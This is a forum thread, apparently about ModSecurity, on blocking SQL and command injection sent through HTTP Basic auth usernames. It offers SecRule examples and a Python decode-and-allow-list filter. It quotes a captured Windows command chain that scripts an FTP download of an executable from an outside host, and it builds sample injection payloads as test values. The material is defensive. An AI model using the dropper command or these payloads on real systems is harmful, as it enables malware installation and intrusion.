Filtering Hack Attempts Via Http Auth
Is there a way I can filter attempts to hack via HTTP auth? I'm getting HTTP auth requests which are trying to use SQL injection with the login/username.
It's not getting anywhere, but I would like to stop the request before it reaches the application if possible. I tried using SecFilter but that doesn't seem to stop it (I assume that it's just looking at the actual request string rather than the HTTP auth details).

EDIT: Apologies, feel free to move this into General. I didn't mean to put this in Features/Feedback.

What SecFilter rule did you use? It should work; it can match a pattern against any HTTP request header.

I was using

SecFilter "rewetsr"

This is the command that was coming through (after a load of unicode characters):

cmd /c echo open 1.1.1.1 21 > o&echo user 1 1 >> o &echo get rewetsr.exe >> o &echo quit >> o &ftp -n -s'

Use SecFilterSelective or the new "SecRule" directive.

OK, so if I read this right, something like:

SecRule REMOTE_USER "rewetsr" log,deny,status:403
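
An added example, not from any poster in this thread and not a ModSecurity rule: HTTP Basic credentials travel base64-encoded in the Authorization header, so a literal such as "rewetsr" never appears in the raw header text, and a filter has to decode the username before inspecting it. The Python sketch below shows that decode-then-inspect step as a front-end check; the function names, the allow-list pattern for login names, and the sample credentials are all assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Assumption: legitimate login names are short and use only these characters.
ALLOWED_USER = re.compile(r"[A-Za-z0-9._@-]{1,64}")

def basic_auth_username(header):
    """Return the decoded username from an Authorization header value.

    Returns None when the scheme is not Basic; raises ValueError when the
    header claims Basic but the credentials cannot be decoded.
    """
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except binascii.Error as exc:
        raise ValueError("malformed Basic credentials") from exc
    # Undecodable bytes become U+FFFD, which the allow-list then rejects.
    user, sep, _password = raw.decode("utf-8", errors="replace").partition(":")
    if not sep:
        raise ValueError("missing ':' separator")
    return user

def decide(header):
    """Return the HTTP status a front-end filter would give this header."""
    try:
        user = basic_auth_username(header)
    except ValueError:
        return 400                      # broken credentials: reject early
    if user is None:
        return 200                      # not Basic auth, nothing to inspect
    return 200 if ALLOWED_USER.fullmatch(user) else 403

def make_header(user, password):
    """Build a Basic Authorization header value for the samples below."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()

# Constructed sample headers (not captured traffic).
NORMAL = make_header("alice", "s3cret")
SQLI = make_header("admin' OR '1'='1", "x")
DROPPER = make_header("a&echo get rewetsr.exe >> o", "x")

if __name__ == "__main__":
    for name, hdr in [("normal", NORMAL), ("sqli", SQLI), ("dropper", DROPPER)]:
        # Second column: does the literal string appear in the raw header?
        print(name, "rewetsr" in hdr, decide(hdr))
```

An allow-list on the decoded username rejects both the SQL injection and the command-injection samples without needing a signature per payload.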